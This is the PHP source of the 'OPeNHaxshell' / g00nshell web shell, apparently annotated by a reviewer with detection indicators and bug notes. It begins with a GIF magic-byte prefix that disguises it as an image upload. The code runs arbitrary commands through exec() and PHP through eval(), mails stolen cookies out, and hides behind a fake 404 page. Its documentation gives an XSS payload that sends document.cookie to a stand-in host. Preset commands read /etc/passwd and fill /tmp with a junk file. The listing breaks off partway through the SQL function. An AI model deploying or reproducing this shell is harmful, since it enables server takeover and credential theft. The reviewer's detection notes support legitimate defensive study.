Code Source Final OPeNHaxshell v1.3

This document appears to be documentation for an open source PHP web shell called OPeNHaxshell. It provides information on how to use the shell, such as executing commands via URLs, stealing cookies, and the different verification levels. It also lists known bugs, credits contributors, and warns administrators to delete the file if it is found without approval. The shell allows accessing files, viewing PHP info, executing PHP code, running SQL, sending emails, uploading files, and more through a graphical user interface.


1 GIF89;a

2 666
3 <?php
// NOTE(review): everything above the open tag is sent to the client verbatim.
// The first line looks like a GIF magic-bytes prefix (the stray ';' may be a
// rendering artefact). PHP code that follows image magic bytes is a
// well-known pattern to scan for when auditing upload directories: check the
// file body for '<?php', not just its extension or declared MIME type.
4 /*
5
6 ###
7 ###
8 ###
9 ###
10 ###
11 ###
12 ###
13 ###
14 ###
15 ###
16 ###
17 ###
18 ###
19 ###
20 ###
21 ###
22 ###
23 ###
24 ###
25 ###
26 ###
27 ###
28 ###
29 ###
30 ###
31 ###
32 ###
33 ###
34 ###
35 ###
36 ###
37 ###
38 ###
39 ###
40 ###
41 # [OPeNHax]Tn presents: #
42 # OPeNHaxshell v1.3 final #
43
44 ###
45 ###
46 ###
47 ###
48 ###
49 ###
50 ###
51 ###
52 ###
53 ###
54 ###
55 ###
56 ###
57 ###DOCUMENTATION
58 ###
59 ###
60 ###
61 ###
62 ###
63 ###
64 ###
65 ###
66 ###
67 ###
68 ###
69 ###
70 ###
71 ####
72 #To execute commands, simply include ?cmd=___ in the url. #
73 #Ex: http://site.com/shl.php?cmd=whoami #
74 # #
75 #To steal cookies, use ?cookie=___ in the url. #
76 #Ex: <script>document.location.href= #
77 #'http://site.com/shl.php?cookie='+document.cookies</script> #
78
79 ###
80 ###
81 ###
82 ###
83 ###
84 ###
85 ###
86 ###
87 ###
88 ###
89 ###
90 ###
91 ###VERIFICATION LEVELS
92 ###
93 ###
94 ###
95 ###
96 ###
97 ###
98 ###
99 ###
100 ###
101 ###
102 ###
103 ####
104 #0: No protection; anyone can access #
105 #1: User-Agent required #
106 #2: Require IP #
107 #3: Basic Authentication #
108
109 ###
110 ###
111 ###
112 ###
113 ###
114 ###
115 ###
116 ###
117 ###
118 ###
119 ###
120 ###
121 ###
122 ###
123 ###KNOWN BUGS
124 ###
125 ###
126 ###
127 ###
128 ###
129 ###
130 ###
131 ###
132 ###
133 ###
134 ###
135 ###
136 ###
137 ###
138 ###
139 #Windows directory handling #
140 # #
141 #The SQL tool is NOT complete. There is currently no editing function#
142 #available. Some time in the future this may be fixed, but for now #
143 #don't complain to me about it #
144
145 ###
146 ###
147 ###
148 ###
149 ###
150 ###
151 ###
152 ###
153 ###
154 ###
155 ###
156 ###
157 ###
158 ###
159 ###
160 ###SHOUTS
161 ###
162 ###
163 ###
164 ###
165 ###
166 ###
167 ###
168 ###
169 ###
170 ###
171 ###
172 ###
173 ###
174 ###
175 ###
176 ###
177 #pr0be - Beta testing & CSS #
178 #TrinTiTTY - Beta testing #
179 #clorox - Beta testing #
180 #Everyone else at g00ns.net #
181
182 ###
183 ###
184 ###
185 ###
186 ###
187 ###
188 ###
189 ###
190 ###
191 ###
192 ###
193 ###NOTE TO ADMINISTRATORS
194 ###
195 ###
196 ###
197 ###
198 ###
199 ###
200 ###
201 ###
202 ###
203 ###
204 ###
205 ###
206 #If this script has been found on your server without your approval, #
207 #it would probably be wise to delete it and check your logs. #
208
209 ###
210 ###
211 ###
212 ###
213 ###
214 ###
215 ###
216 ###
217 ###
218 ###
219 ###
220 ###
221 ###
222 ###
223 ###
224 ###
225 ###
226 ###
227 ###
228 ###
229 ###
230 ###
231 ###
232 ###
233 ###
234 ###
235 ###
236 ###
237 ###
238 ###
239 ###
240 ###
241 ###
242 ###
243 ###
244 */
245 // Configuration
// $auth selects the access gate applied in the switch at the end of this
// block: 0 = none, 1 = User-Agent MD5 must match $uakey, 2 = REMOTE_ADDR must
// be in $IP, 3 = HTTP Basic credentials checked by userauth().
246 $auth = 0;
// The MD5 literals below ship with the file as distributed; together with the
// 'g00nshell' banner in style() they are a convenient fingerprint for finding
// other copies of this shell on a host.
247 $uakey = "b5c3d0b28619de70bf5588505f4061f2"; // MD5 encoded user-agent
248 $IP = array("127.0.0.2","127.0.0.1"); // IP Addresses allowed to access shell
249 $email = ""; // E-mail address where cookies will be sent
250 $user = "af1035a85447f5aa9d21570d884b723a"; // MD5 encoded User
251 $pass = "47e331d2b8d07465515c50cb0fad1e5a"; // MD5 encoded Password
252 // Global Variables
253 $version = "1.3 final";
254 $self = $_SERVER['PHP_SELF'];
255 $soft = $_SERVER["SERVER_SOFTWARE"];
// split() was removed in PHP 7.0, so on a modern runtime this line is a fatal
// error before any request handling happens; the mysql_* calls used later in
// the file were removed in the same release.
256 $servinf = split("[:]", getenv('HTTP_HOST'));
257 $servip = $servinf[0];
258 $servport = $servinf[1];
259 $uname = php_uname();
// Runs on every request, before and regardless of the $auth gate: a 'whoami'
// child spawned by the web-server worker is a process-telemetry indicator
// for this file.
260 $curuser = @exec('whoami');
// Request parameters the dispatcher keys on: cmd, act, cookie, f, dir, img
// (GET) and contents, gf (POST). These names are what to search for in
// access logs. None of the reads are guarded with isset().
261 $cmd = $_GET['cmd'];
262 $act = $_GET['act'];
263 $cmd = $_GET['cmd'];
264 $cookie = $_GET['cookie'];
265 $f = $_GET['f'];
// cleandir() is defined further down the file; PHP hoists unconditional
// top-level function definitions, so the call resolves.
266 $curdir = cleandir(getcwd());
// $dir is not assigned anywhere above, so the first branch is the one taken
// unless something like register_globals pre-populated it (presumably). The
// two elseif branches test an identical condition and read $_SESSION before
// session_start() is called below.
267 if(!$dir){$dir = $_GET['dir'];}
268 elseif($dir && $_SESSION['dir']){$dir = $_SESSION['dir'];}
269 elseif($dir && $_SESSION['dir']){$dir = $curdir;}
270 if($dir && $dir != "nullz"){$dir = cleandir($dir);}
271 $contents = $_POST['contents'];
272 $gf = $_POST['gf'];
273 $img = $_GET['img'];
274 session_start();
275 @set_time_limit(5);
// Access gate. Every failing level ends the request through hide(), which
// emits a fake 404 page; level 0 (the shipped default) performs no check.
276 switch($auth){ // Authentication switcher
277 case 0: break;
278 case 1: if(md5($_SERVER['HTTP_USER_AGENT']) != $uakey){hide();}
break;
279 case 2: if(!in_array($_SERVER['REMOTE_ADDR'],$IP)){hide();} break;
280 case 3: if(!$_SERVER["PHP_AUTH_USER"]){userauth();} break;
281 }
282
// Level-3 gate: sends a Basic challenge and compares the MD5 of the supplied
// user name against $user. No explicit 401 status is set, and any failure
// ends the request through hide() (the fake 404 page).
// NOTE(review): in the second operand the closing parenthesis places the
// whole comparison inside md5(), so that operand is a 32-character string
// (always truthy) rather than a boolean; as written, level 3 appears to
// always fall through to hide(). Worth knowing when interpreting observed
// responses from a copy configured with $auth = 3.
283 function userauth(){ // Basic authentication function
284 global $user, $pass;
285 header("WWW-Authenticate: Basic realm='Secure Area'");
286 if(md5($_SERVER["PHP_AUTH_USER"]) != $user ||
md5($_SERVER["PHP_AUTH_PW"] != $pass)){
287 hide();
288 die();
289 }
290 }
// Request dispatcher. With no recognised parameter the menu is shown;
// otherwise the branches below are tried in order.
291 if(!$act && !$cmd && !$cookie && !$f && !$dir && !$gf && !$img){main();}
// ?cmd=... is passed straight to exec(); it needs no act parameter, so a
// bare 'cmd=' in the query string is the simplest log indicator for this
// shell.
292 elseif(!$act && $cmd){
293 style();
294 echo("<b>Results:</b>\n<br><textarea rows=20 cols=100>");
295 $cmd = exec($cmd, $result);
296 foreach($result as $line){echo($line . "\n");}
297 echo("</textarea>");
298 }
// ?cookie=... forwards the value by e-mail to $email (empty as shipped) and
// then answers with the fake 404 page. Outbound mail from the web-server
// account triggered by a GET request is the corresponding host indicator.
299 elseif($cookie){@mail("$email", "Cookie Data", "$cookie", "From: $email");
hide();} // Cookie stealer function
300 elseif($act == "view" && $f && $dir){view($f, $dir);}
301 elseif($img){img($img);}
302 elseif($gf){grab($gf);}
303 elseif($dir){files($dir);}
304 else{
// Menu actions. The second "sql" case is unreachable because the first one
// matches. 'bshell' is linked from main() but has no case here, so it lands
// in the default branch.
305 switch($act){
306 case "phpinfo": phpinfo();break;
307 case "sql": sql();break;
308 case "files": files($dir);break;
309 case "email": email();break;
310 case "cmd": cmd();break;
311 case "upload": upload();break;
312 case "tools": tools();break;
313 case "sqllogin": sqllogin();break;
314 case "sql": sql();break;
315 case "lookup": lookup();break;
316 case "kill": kill();break;
317 case "phpexec": execphp();break;
318 default: main();break;
319 }
320 }
// Normalises a path: resolves it with realpath() and converts backslashes to
// forward slashes. realpath() returns false for a path that does not exist,
// in which case the replacements operate on false and the function returns
// an empty string (presumably; not exercised here). The first replacement
// turns a pair of backslashes into "//", which the second then keeps only
// when four slashes are present, so "//" can survive in the result.
321 function cleandir($d){ // Function to clean up the $dir and $curdir variables
322 $d = realpath($d);
323 $d = str_replace("\\\\", "//", $d);
324 $d = str_replace("////", "//", $d);
325 $d = str_replace("\\", "/", $d);
326 return($d);
327 }
// Terminates the request with a body imitating Apache's default 404 page,
// interpolating the script path, server software, host and port so it reads
// like a genuine error. No status header is sent, so the response still
// carries HTTP 200: a 200 whose body says "404 Not Found" is a detectable
// mismatch in proxy or WAF logs, and the real server never produces one.
328 function hide(){ // Hiding function
329 global $self, $soft, $servip, $servport;
330 die("<!DOCTYPE HTML PUBLIC '-//IETF//DTD HTML 2.0//EN'>
331 <HTML><HEAD>
332 <TITLE>404 Not Found</TITLE>
333 </HEAD><BODY>
334 <H1>Not Found</H1>
335 The requested URL $self was not found on this server.<P>
336 <P>Additionally, a 404 Not Found
337 error was encountered while trying to use an ErrorDocument to handle the
request.
338 <HR>
339 <ADDRESS>$soft Server at $servip Port $servport</ADDRESS>
340 </BODY></HTML>");
341 }
// Emits the <html><head> preamble shared by every page. The <title> carries
// the literal "g00nshell v<version> - <host>" banner, which is a reliable
// string to match in captured responses or full-packet captures.
342 function style(){ // Style / header function
343 global $servip,$version;
344 echo("<html>\n
345 <head>\n
346 <title>g00nshell v" . $version . " - " . $servip . "</title>\n
347 <style>\n
348 body { background-color:#000000; color:white; font-family:Verdana; font-
size:11px; }\n
349 h1 { color:white; font-family:Verdana; font-size:11px; }\n
350 h3 { color:white; font-family:Verdana; font-size:11px; }\n
351 input,textarea,select { color:#FFFFFF; background-color:#2F2F2F; border:1px
solid #4F4F4F; font-family:Verdana; font-size:11px; }\n
352 textarea { font-family:Courier; font-size:11px; }\n
353 a { color:#6F6F6F; text-decoration:none; font-family:Verdana; font-
size:11px; }\n
354 a:hover { color:#7F7F7F; }\n
355 td,th { font-size:12px; vertical-align:middle; }\n
356 th { font-size:13px; }\n
357 table { empty-cells:show;}\n
358 .inf { color:#7F7F7F; }\n
359 </style>\n
360 </head>\n");
361 }
// Menu page: prints host facts (uname, cwd, whoami/id output, safe_mode,
// open_basedir, disable_functions, MySQL availability), a link bar built
// from $act, and an iframe that loads ?act=files. Ends with die(). Each
// render spawns a second child process via @exec('id').
362 function main(){ // Main/menu function
363 global $self, $servip, $servport, $uname, $soft, $banner, $curuser, $version;
364 style();
// Link captions keyed by act name; 'bshell' has no handler in the
// dispatcher and falls through to this menu.
365 $act = array('cmd'=>'Command Execute','files'=>'File View','phpinfo'=>'PHP
info', 'phpexec'=>'PHP Execute',
366 'tools'=>'Tools','sqllogin'=>'SQL','email'=>'Email','upload'=>'Get
Files','lookup'=>'List Domains','bshell'=>'Bindshell','kill'=>'Kill Shell');
367 $capt = array_flip($act);
368 echo("<form method='GET' name='shell'>");
369 echo("<b>Host:</b> <span class='inf'>" . $servip . "</span><br>");
370 echo("<b>Server software:</b> <span class='inf'>" . $soft . "</span><br>");
371 echo("<b>Uname:</b> <span class='inf'>" . $uname . "</span><br>");
372 echo("<b>Shell Directory:</b> <span class='inf'>" . getcwd() . "</span><br>");
373 echo("<div style='display:none' id='info'>");
374 echo("<b>Current User:</b> <span class='inf'>" . $curuser . "</span><br>");
375 echo("<b>ID:</b> <span class='inf'>" . @exec('id') . "</span><br>");
376 if(@ini_get('safe_mode') != ""){echo("<b>Safemode:</b> <font
color='red'>ON</font>");}
377 else{echo("<b>Safemode:</b> <font color='green'>OFF</font>");}
378 echo("\n<br>\n");
379 if(@ini_get('open_basedir') != ""){echo("<b>Open Base Dir:</b> <font
color='red'>ON</font> [ <span class='inf'>" . ini_get('open_basedir') . "</span> ]");}
380 else{echo("<b>Open Base Dir:</b> <font color='green'>OFF</font>");}
381 echo("\n<br>\n");
382 if(@ini_get('disable_functions') != ""){echo("<b>Disabled functions:</b> " .
@ini_get('disable_functions'));}
383 else{echo("<b>Disabled functions:</b> None");}
384 echo("\n<br>\n");
// mysql_connect is written as a bare constant here, not a string, so this
// test checks the string "mysql_connect" only through PHP's undefined-
// constant fallback (presumably).
385 if(@function_exists(mysql_connect)){echo("<b>MySQL:</b> <font
color='green'>ON</font>");}
386 else{echo("<b>MySQL:</b> <font color='red'>OFF</font>");}
387 echo("</div>");
388 echo("[ <a href='#hax' onClick=\"document.getElementById('info').style.display
= 'block';\">More</a> ] ");
389 echo("[ <a href='#hax' onClick=\"document.getElementById('info').style.display
= 'none';\">Less</a> ]");
390 echo("<center>");
391 echo("<h3 align='center'>Links</h3>");
// The raw query string is echoed unescaped into each link's href.
392 if($_SERVER['QUERY_STRING']){foreach($act as $link){echo("[ <a
href='?" . $_SERVER['QUERY_STRING'] . "&act=" . $capt[$link] . "'
target='frm'>" . $link . "</a> ] ");}}
393 else{foreach($act as $link){echo("[ <a href='?act=" . $capt[$link] . "'
target='frm'>" . $link . "</a> ] ");}}
394 echo("</center>");
395 echo("<hr>");
396 echo("<br><iframe name='frm' style='width:100%; height:65%; border:0;' src='?
act=files'></iframe>");
397 echo("<pre style='text-align:center'>:: g00nshell <font color='red'>v" . $version .
"</font> ::</pre>");
398 die();
399 }
// ?act=cmd page: renders a form, then runs whichever of POST cmd / POST
// precmd is non-empty through @exec() and prints the captured lines. A POST
// to this script carrying a 'cmd' or 'precmd' field is the request-side
// indicator; the spawned child process is the host-side one.
400 function cmd(){ // Command execution function
401 style();
402 echo("<form name='CMD' method='POST'>");
403 echo("<b>Command:</b><br>");
404 echo("<input name='cmd' type='text' size='50'> ");
405 echo("<select name='precmd'>");
406 $precmd = array(''=>'','Read /etc/passwd'=>'cat /etc/passwd','Open
ports'=>'netstat -an',
407 'Running Processes'=>'ps -aux', 'Uname'=>'uname -a', 'Get UID'=>'id',
408 'Create Junkfile (/tmp/z)'=>'dd if=/dev/zero of=/tmp/z bs=1M
count=1024',
409 'Find passwd files'=>'find / -type f -name passwd');
410 $capt = array_flip($precmd);
411 foreach($precmd as $c){echo("<option value='" . $c . "'>" . $capt[$c] . "\n");}
412 echo("</select><br>\n");
413 echo("<input type='submit' value='Execute'>\n");
414 echo("</form>\n");
// Free-text field wins over the preset; with neither present the page ends
// after the form.
415 if($_POST['cmd'] != ""){$x = $_POST['cmd'];}
416 elseif($_POST['precmd'] != ""){$x = $_POST['precmd'];}
417 else{die();}
418 echo("Results: <br><textarea rows=20 cols=100>");
419 $cmd = @exec($x, $result);
420 foreach($result as $line){echo($line . "\n");}
421 echo("</textarea>");
422 }
// ?act=phpexec page: echoes the submitted code back into the form and, when
// POST phpexec is non-empty, eval()s it after stripslashes(). This is the
// file's most direct code-execution path and the one a disable_functions
// setting does not touch; the 'phpexec' POST field name is the log indicator.
423 function execphp(){ // PHP code execution function
424 style();
425 echo("<h4>Execute PHP Code</h4>");
426 echo("<form method='POST'>");
427 echo("<textarea name='phpexec' rows=5 cols=100>");
428 if(!$_POST['phpexec']){echo("/*Don't include <? ?> tags*/\n");}
429 echo(htmlentities($_POST['phpexec']) . "</textarea>\n<br>\n");
430 echo("<input type='submit' value='Execute'>");
431 echo("</form>");
432 if($_POST['phpexec']){
433 echo("<textarea rows=10 cols=100>");
434 eval(stripslashes($_POST['phpexec']));
435 echo("</textarea>");
436 }
437 }
// MySQL credential form for ?act=sqllogin. session_start() has already been
// called at file scope, so this second call presumably raises a notice; the
// Location header is sent after style() has produced output only when the
// session flag is unset, since the redirect branch runs first. The password
// field is a plain type='text' input and the credentials are POSTed to
// ?act=sql, where sql() stores them in $_SESSION.
438 function sqllogin(){ // MySQL login function
439 session_start();
440 if($_SESSION['isloggedin'] == "true"){
441 header("Location: ?act=sql");
442 }
443 style();
444 echo("<form method='post' action='?act=sql'>");
445 echo("User:<br><input type='text' name='un' size='30'><br>\n");
446 echo("Password:<br><input type='text' name='pw' size='30'><br>\n");
447 echo("Host:<br><input type='text' name='host' size='30'
value='localhost'><br>\n");
448 echo("Port:<br><input type='text' name='port' size='30' value='3306'><br>\n");
449 echo("<input type='submit' value='Login'>");
450 echo("</form>");
451 die();
452 }
453 function sql(){ // General SQL Function
454 session_start();
455 if(!$_GET['sqlf']){style();}
456 if($_POST['un'] && $_POST['pw']){;
457 $_SESSION['sql_user'] = $_POST['un'];
458 $_SESSION['sql_password'] = $_POST['pw'];
459 }
460 if($_POST['host']){$_SESSION['sql_host'] = $_POST['host'];}
461 else{$_SESSION['sql_host'] = 'localhost';}
462 if($_POST['port']){$_SESSION['sql_port'] = $_POST['port'];}
463 else{$_SESSION['sql_port'] = '3306';}
464 if($_SESSION['sql_user'] && $_SESSION['sql_password']){
465 if(!($sqlcon = @mysql_connect($_SESSION['sql_host'] . ':' .
$_SESSION['sql_port'], $_SESSION['sql_user'], $_SESSION['sql_password']))){
466 unset($_SESSION['sql_user'], $_SESSION['sql_password'],
$_SESSION['sql_host'], $_SESSION['sql_port']);
467 echo("Invalid credentials<br>\n");
468 die(sqllogin());
469 }
470 else{
471 $_SESSION['isloggedin'] = "true";
472 }
473 }
474 else{
475 die(sqllogin());
476 }
477 if ($_GET['db']){
478 mysql_select_db($_GET['db'], $sqlcon);
479 if($_GET['sqlquery']){
480 $dat = mysql_query($_GET['sqlquery'], $sqlcon) or die(mysql_error());
481 $num = mysql_num_rows($dat);
482 for($i=0;$i<$num;$i++){
483 echo(mysql_result($dat, $i) . "<br>\n");
484 }
485 }
486 else if($_GET['table'] && !$_GET['sqlf']){
487 echo("<a href='?act=sql&db=" . $_GET['db'] . "&table=" . $_GET['table'] .
"&sqlf=ins'>Insert Row</a><br><br>\n");
488 echo("<table border='1'>");
489 $query = "SHOW COLUMNS FROM " . $_GET['table'];
490 $result = mysql_query($query, $sqlcon) or die(mysql_error());
491 $i = 0;
